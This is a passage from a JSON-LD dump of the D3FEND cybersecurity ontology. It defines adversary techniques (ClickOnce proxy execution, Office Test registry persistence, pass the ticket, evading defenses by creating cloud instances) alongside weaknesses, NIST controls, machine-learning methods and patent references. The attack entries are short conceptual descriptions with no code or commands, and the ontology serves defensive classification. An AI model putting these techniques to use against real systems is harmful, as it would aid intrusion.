      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDeviceConnectionEvent"
      }
    },
    {
      "@id": "d3f:StorageImage",
      "@type": "owl:Class",
      "d3f:definition": "A storage image is a complete, encapsulated representation of a storage medium or system environment. It contains all the data, files, and configurations necessary to replicate or deploy a specific system state or software setup.",
      "rdfs:label": "Storage Image",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ComputingImage"
        },
        {
          "@id": "d3f:File"
        }
      ]
    },
    {
      "@id": "d3f:T1127.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1127.002",
      "d3f:definition": "Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)",
      "rdfs:label": "ClickOnce",
      "rdfs:subClassOf": {
        "@id": "d3f:T1127"
      }
    },
    {
      "@id": "d3f:OTDownloadControlProgramCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Commands a remote device to download a control program.",
      "d3f:modifies": {
        "@id": "d3f:OTControlProgram"
      },
      "d3f:synonym": "OT Program Download",
      "rdfs:comment": "GE-SRTP: PROGRAM STORE (UPLOAD FROM PLC)\nGE-SRTP: PROGRAM LOAD (DOWNLOAD TO PLC)",
      "rdfs:label": "OT Download Control Program Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://attack.mitre.org/techniques/T0843/"
        },
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyControlProgramCommand"
        },
        {
          "@id": "_:N205d82aa82844a13b77eb89a907e1dfb"
        }
      ]
    },
    {
      "@id": "_:N205d82aa82844a13b77eb89a907e1dfb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlProgram"
      }
    },
    {
      "@id": "d3f:Distribution-basedClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DBC",
      "d3f:definition": "Distribution-based clustering creates and groups data points based on their likely hood of belonging to the same probability distribution (Gaussian, Binomial, etc.) in the data.",
      "d3f:kb-article": "## References\nAnalytixLabs. (n.d.). Types of Clustering Algorithms. [Link](https://www.analytixlabs.co.in/blog/types-of-clustering-algorithms/#:~:text=Distribution-Based)",
      "rdfs:label": "Distribution-based Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:ClusterAnalysis"
      }
    },
    {
      "@id": "d3f:CCI-001436_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization disables organization-defined networking protocols within the information system deemed to be nonsecure except for explicitly identified components in support of specific operational requirements.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-25T00:00:00"
      },
      "rdfs:label": "CCI-001436"
    },
    {
      "@id": "d3f:TransportLayerEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event occurring at the transport layer, responsible for end-to-end communication and data transfer management.",
      "rdfs:label": "Transport Layer Event",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkEvent"
      }
    },
    {
      "@id": "d3f:T1033",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1033",
      "d3f:definition": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
      "d3f:may-access": [
        {
          "@id": "d3f:DirectoryService"
        },
        {
          "@id": "d3f:GetSystemConfigValue"
        },
        {
          "@id": "d3f:PasswordFile"
        },
        {
          "@id": "d3f:ProcessSegment"
        }
      ],
      "d3f:may-invoke": [
        {
          "@id": "d3f:CopyToken"
        },
        {
          "@id": "d3f:CreateProcess"
        }
      ],
      "rdfs:label": "System Owner/User Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:N219c34c7ba8a46f9af7bbb94cb8725ab"
        },
        {
          "@id": "_:N17520f889f34440c915b0e8d83865bac"
        },
        {
          "@id": "_:Nbde8160a493b4864bb0aa898dfaf15c6"
        },
        {
          "@id": "_:Na52e0639993f431cb3a772fa8419b741"
        },
        {
          "@id": "_:N5f73821e9c374d0f9a1bd5f06ff3f46e"
        },
        {
          "@id": "_:Nd278a0172b194d459bad240b526b39ab"
        }
      ]
    },
    {
      "@id": "_:N219c34c7ba8a46f9af7bbb94cb8725ab",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DirectoryService"
      }
    },
    {
      "@id": "_:N17520f889f34440c915b0e8d83865bac",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GetSystemConfigValue"
      }
    },
    {
      "@id": "_:Nbde8160a493b4864bb0aa898dfaf15c6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PasswordFile"
      }
    },
    {
      "@id": "_:Na52e0639993f431cb3a772fa8419b741",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "_:N5f73821e9c374d0f9a1bd5f06ff3f46e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CopyToken"
      }
    },
    {
      "@id": "_:Nd278a0172b194d459bad240b526b39ab",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:T1097",
      "@type": "owl:Class",
      "d3f:attack-id": "T1097",
      "d3f:definition": "Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1550.003",
      "rdfs:label": "Pass the Ticket",
      "rdfs:seeAlso": {
        "@id": "d3f:T1550.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:LateralMovementTechnique"
      }
    },
    {
      "@id": "d3f:AML.T0010.003",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0010.003",
      "d3f:definition": "AI-enabled systems often rely on open sourced models in various ways.\nMost commonly, the victim organization may be using these models for fine tuning.\nThese models will be downloaded from an external source and then used as the base for the model as it is tuned on a smaller, private dataset.\nLoading models often requires executing some saved code in the form of a saved model file.\nThese can be compromised with traditional malware, or through some adversarial AI techniques.",
      "rdfs:label": "Model - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0010.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0010"
      },
      "skos:prefLabel": "Model"
    },
    {
      "@id": "d3f:UserAccountPasswordResetEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a user account's password is reset, typically due to a forgotten password or administrative action.",
      "rdfs:label": "User Account Password Reset Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserAccountEvent"
        },
        {
          "@id": "_:Nd39c6a24e7ab48649c7103e5563f12ff"
        },
        {
          "@id": "_:N57b0c5ac828b4e64b9bf06c6c7c28ff3"
        }
      ]
    },
    {
      "@id": "_:Nd39c6a24e7ab48649c7103e5563f12ff",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "_:N57b0c5ac828b4e64b9bf06c6c7c28ff3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccountCreationEvent"
      }
    },
    {
      "@id": "d3f:CCI-000027_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces dynamic information flow control based on organization-defined policies.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-13T00:00:00"
      },
      "rdfs:label": "CCI-000027"
    },
    {
      "@id": "d3f:Boosting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-BOO",
      "d3f:definition": "Boosting is a sequential process where each subsequent model attempts to correct the errors of the previous model",
      "d3f:kb-article": "## How it works\nBoosting consists of using sequentially weak learners where each iteration’s training focuses on previously misclassified instances in order to improve on the previous iteration. This process is continued iteratively until the final prediction is made by aggregating the previous predictions.\n\n## Considerations\nBoosting can be computationally expensive, prone to overfitting, and slower to train compared to other ensemble methods.\n\nThere are three main types of Boosting algorithms\n - Adaptive Boosting\nAdaptive Boosting (sometimes called AdaBoost) works by adding equal importance to each piece of a dataset and running it through the base learning algorithms. Every algorithm that errors, the boosting algorithm assigns a higher importance to. This continues until an acceptable level of confidence is reached.\n - Gradient Boosting\nGradient Boosting starts by training multiple models simultaneously to gather a strong estimate of strength to build new base learning algorithms.\n - XGBoosting\nXGBoosting is a scalable tree boosting model. Using decision trees, weight is assigned to each variable and put into a decision tree. Outputs that are classified by the algorithm as wrong or weak are put into a second decision tree and the results form a stronger model.\n\n## References\nSciencedirect. (n.d.). Semi-supervised learning: An overview. [Link](https://www.sciencedirect.com/science/article/pii/S1319157823000228)",
      "rdfs:label": "Boosting",
      "rdfs:subClassOf": {
        "@id": "d3f:EnsembleLearning"
      }
    },
    {
      "@id": "d3f:CWE-141",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-141",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as parameter or argument delimiters when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Parameter/Argument Delimiters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-140"
      }
    },
    {
      "@id": "d3f:OTControlFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:OTLogicVariable"
      },
      "d3f:definition": "A function which accesses OT Control Variables",
      "rdfs:label": "OT Control Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:Nfbb1b6e07da24779bfe8d576c2f6d699"
        }
      ]
    },
    {
      "@id": "_:Nfbb1b6e07da24779bfe8d576c2f6d699",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTLogicVariable"
      }
    },
    {
      "@id": "d3f:T1596",
      "@type": "owl:Class",
      "d3f:attack-id": "T1596",
      "d3f:definition": "Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan)",
      "rdfs:label": "Search Open Technical Databases",
      "rdfs:subClassOf": {
        "@id": "d3f:ReconnaissanceTechnique"
      }
    },
    {
      "@id": "d3f:HomogenousTransferLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-HTL",
      "d3f:definition": "In homogeneous transfer learning, the feature spaces of the source and target domains is of the same dimension (Ds = Dt) while the data of both domains is represented by the same attributes (Xs = Xt) and labels (Ys = Yt). Thus, homogeneous transfer learning aims to bridge the gap in the data distributions experienced during cross-domain transfer.",
      "d3f:kb-article": "## References\nKhalil, K., Asgher, U., & Ayaz, Y. (2022). Novel fNIRS study on homogeneous symmetric feature-based transfer learning for brain-computer interface. Scientific Reports, 12, 3198. [Link](https://www.nature.com/articles/s41598-022-06805-4).",
      "rdfs:label": "Homogenous Transfer Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:TransferLearning"
      }
    },
    {
      "@id": "d3f:T1023",
      "@type": "owl:Class",
      "d3f:attack-id": "T1023",
      "d3f:definition": "Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1547.009",
      "rdfs:label": "Shortcut Modification",
      "rdfs:seeAlso": {
        "@id": "d3f:T1547.009"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:Reference-Database_for_receiving_storing_and_compiling_information_about_email_messages",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20050091319A1/"
      },
      "d3f:kb-author": "Steven Kirsch",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:DomainNameReputationAnalysis"
        },
        {
          "@id": "d3f:IPReputationAnalysis"
        }
      ],
      "d3f:kb-reference-title": "Database for receiving, storing and compiling information about email messages",
      "rdfs:label": "Reference - Database for receiving, storing and compiling information about email messages"
    },
    {
      "@id": "d3f:T1578.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1578.002",
      "d3f:creates": [
        {
          "@id": "d3f:CloudInstanceMetadata"
        },
        {
          "@id": "d3f:Host"
        }
      ],
      "d3f:definition": "An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)",
      "rdfs:label": "Create Cloud Instance",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1578"
        },
        {
          "@id": "_:Nfa58cbc87f4744d39fc78b9fabc60e01"
        },
        {
          "@id": "_:N7b54545c497347cd9bee396fb753418e"
        }
      ]
    },
    {
      "@id": "_:Nfa58cbc87f4744d39fc78b9fabc60e01",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudInstanceMetadata"
      }
    },
    {
      "@id": "_:N7b54545c497347cd9bee396fb753418e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Host"
      }
    },
    {
      "@id": "d3f:T1595.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1595.002",
      "d3f:definition": "Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.",
      "rdfs:label": "Vulnerability Scanning",
      "rdfs:subClassOf": {
        "@id": "d3f:T1595"
      }
    },
    {
      "@id": "d3f:CopyMemoryFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:copies": {
        "@id": "d3f:MemoryBlock"
      },
      "d3f:definition": "Copies a memory block from one location to another.",
      "rdfs:label": "Copy Memory Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:Ndf81f6a954754f648ec2d4dc318cbf10"
        }
      ]
    },
    {
      "@id": "_:Ndf81f6a954754f648ec2d4dc318cbf10",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:copies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryBlock"
      }
    },
    {
      "@id": "d3f:AuthenticationFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:authenticates": {
        "@id": "d3f:UserAccount"
      },
      "d3f:definition": "Authenticates a user account by verifying a presented credential.",
      "rdfs:label": "Authentication Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:Na70a95dd5c08487cb3d9ae862c975d1d"
        }
      ]
    },
    {
      "@id": "_:Na70a95dd5c08487cb3d9ae862c975d1d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:CWE-511",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-511",
      "d3f:definition": "The product contains code that is designed to disrupt the legitimate operation of the product (or its environment) when a certain time passes, or when a certain logical condition is met.",
      "rdfs:label": "Logic/Time Bomb",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-506"
      }
    },
    {
      "@id": "d3f:EmailReceiveEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an email is delivered to a recipient's mail server or mailbox. This includes receiving messages from internal or external sources via protocols such as IMAP, POP3, or their secure variants.",
      "rdfs:label": "Email Receive Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EmailEvent"
        },
        {
          "@id": "_:Ne299314e5dfd4006a6beba24af4be2cf"
        }
      ]
    },
    {
      "@id": "_:Ne299314e5dfd4006a6beba24af4be2cf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EmailSendEvent"
      }
    },
    {
      "@id": "d3f:Reference-TenablePassiveNetworkMonitoring",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.tenable.com/sites/default/files/solution-briefs/SB-Passive-Network-Monitoring.pdf"
      },
      "d3f:kb-abstract": "Tenable Nessus® Network Monitor (NNM), a passive monitoring sensor, continuously discovers active assets on the network and assesses them for vulnerabilities. NNM is based on patented network discovery and vulnerability analysis technology that continuously monitors and profiles non-intrusively. It monitors IPv4, IPv6 and mixed network traffic at the packet layer to determine topology, services and vulnerabilities.",
      "d3f:kb-organization": "Tenable",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:DirectPhysicalLinkMapping"
        },
        {
          "@id": "d3f:PassiveLogicalLinkMapping"
        }
      ],
      "d3f:kb-reference-title": "Tenable Passive Network Monitoring",
      "rdfs:label": "Reference - Tenable Passive Network Monitoring"
    },
    {
      "@id": "d3f:UserAccountEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing operations or state changes performed on user accounts, including lifecycle management, access control modifications, and policy assignments.",
      "rdfs:label": "User Account Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/account_change"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:Ne5c8459ff15a40afb57fb4eaf1e80c82"
        }
      ]
    },
    {
      "@id": "_:Ne5c8459ff15a40afb57fb4eaf1e80c82",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:ServiceEnableEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the activation of a service application, allowing it to start and provide its background or networked functionality.",
      "rdfs:label": "Service Enable Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationEnableEvent"
        },
        {
          "@id": "d3f:ServiceEvent"
        },
        {
          "@id": "_:N988e4e120dd54a5a879503f2480bcf65"
        }
      ]
    },
    {
      "@id": "_:N988e4e120dd54a5a879503f2480bcf65",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceInstallationEvent"
      }
    },
    {
      "@id": "d3f:T1583.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1583.006",
      "d3f:definition": "Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: FireEye APT29) By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.",
      "rdfs:label": "Web Services",
      "rdfs:subClassOf": {
        "@id": "d3f:T1583"
      }
    },
    {
      "@id": "d3f:M1013",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "A future release of D3FEND will define a taxonomy of Source Code Hardening Techniques.",
      "rdfs:label": "Application Developer Guidance"
    },
    {
      "@id": "d3f:Reference-ProtectedComputingEnvironment_MicrosoftTechnologyLicensingLLC",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20060242406A1"
      },
      "d3f:kb-abstract": "A method of establishing a protected environment within a computing device including validating a kernel component loaded into a kernel of the computing device, establishing a security state for the kernel based on the validation, creating a secure process and loading a software component into the secure process, periodically checking the security state of the kernel, and notifying the secure process when the security state of the kernel has changed.",
      "d3f:kb-author": "Sumedh Barde, Jonathan Schwartz, Reid Kuhn, Alexandre Grigorovitch, Kirt Debique, Chadd Knowlton, James Alkove, Geoffrey Dunbar, Michael Grier, Ming Ma, Chaitanya Upadhyay, Adil Sherwani, Arun Kishan",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Microsoft Technology Licensing LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:DriverLoadIntegrityChecking"
      },
      "d3f:kb-reference-title": "Protected computing environment",
      "rdfs:label": "Reference - Protected computing environment - Microsoft Technology Licensing LLC"
    },
    {
      "@id": "d3f:T1137.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1137.002",
      "d3f:definition": "Adversaries may abuse the Microsoft Office \"Office Test\" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "Office Test",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1137"
        },
        {
          "@id": "_:N2b08c17c1a834496b4887e0fbafee469"
        }
      ]
    },
    {
      "@id": "_:N2b08c17c1a834496b4887e0fbafee469",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:Reference-GuidetoOTSecurity",
      "@type": "owl:NamedIndividual"
    },
    {
      "@id": "d3f:T1016.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1016.001",
      "d3f:definition": "Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites.",
      "rdfs:label": "Internet Connection Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:T1016"
      }
    },
    {
      "@id": "d3f:T1566.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1566.004",
      "d3f:definition": "Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.",
      "rdfs:label": "Spearphishing Voice",
      "rdfs:subClassOf": {
        "@id": "d3f:T1566"
      }
    },
    {
      "@id": "d3f:Reference-HeuristicBotnetDetection_PaloAltoNetworksInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20160156644A1"
      },
      "d3f:kb-abstract": "In some embodiments, heuristic botnet detection is provided. In some embodiments, heuristic botnet detection includes monitoring network traffic to identify suspicious network traffic; and detecting a bot based on a heuristic analysis of the suspicious network traffic behavior using a processor, in which the suspicious network traffic behavior includes command and control traffic associated with a bot master. In some embodiments, heuristic botnet detection further includes assigning a score to the monitored network traffic, in which the score corresponds to a botnet risk characterization of the monitored network traffic (e.g., based on one or more heuristic botnet detection techniques); increasing the score based on a correlation of additional suspicious behaviors associated with the monitored network traffic (e.g., based on one or more heuristic botnet detection techniques); and determining the suspicious behavior is associated with a botnet based on the score.",
      "d3f:kb-author": "Xinran Wang; Huagang Xie",
      "d3f:kb-mitre-analysis": "This patent describes detecting botnets using heuristic analysis techniques on collected network flows. The heuristic techniques include:\n\n* Identifying suspicious traffic patterns to detect command and control traffic ex. periodically visiting a known malware URL, a host visiting a malware domain twice every 5 hour and 14 minutes (this is a specific pattern for a variant of Swizzor botnets).\n* Identifying non-standard behaviors such as connecting to a non-standard HTTP port for HTTP traffic, visiting a non-existent domain, downloading executable files with non-standard executable file extensions, communicating using HTTP header with a shorter than common length\n* Analyzing visited domain information to identify the following: visiting a domain with a domain name that is longer than a common domain name length, visiting a dynamic DNS domain, visiting a fast-flux domain, and visiting a recently created domain.\n\nA score is determined based on these factors and if the score is over a threshold, a responsive action is performed.",
      "d3f:kb-organization": "Palo Alto Networks Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:DNSTrafficAnalysis"
      },
      "d3f:kb-reference-title": "Heuristic botnet detection",
      "rdfs:label": "Reference - Heuristic botnet detection - Palo Alto Networks Inc"
    },
    {
      "@id": "d3f:CWE-382",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-382",
      "d3f:definition": "A J2EE application uses System.exit(), which also shuts down its container.",
      "rdfs:label": "J2EE Bad Practices: Use of System.exit()",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-705"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AU-2_2",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Event Logging | Selection of Audit Events by Component",
      "d3f:exactly": {
        "@id": "d3f:LocalAccountMonitoring"
      },
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AU-2(2)"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-2_2",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:control-name": "Account Management | Automated Temporary and Emergency Account Management",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-2(2)"
    },
    {
      "@id": "skos:altLabel",
      "@type": "owl:AnnotationProperty"
    },
    {
      "@id": "d3f:CWE-208",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-208",
      "d3f:definition": "Two separate operations in a product require different amounts of time to complete, in a way that is observable to an actor and reveals security-relevant information about the state of the product, such as whether a particular operation was successful or not.",
      "rdfs:label": "Observable Timing Discrepancy",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-203"
      }
    },
    {
      "@id": "d3f:SenderMTAReputationAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SenderMTAReputationAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:Email"
      },
      "d3f:d3fend-id": "D3-SMRA",
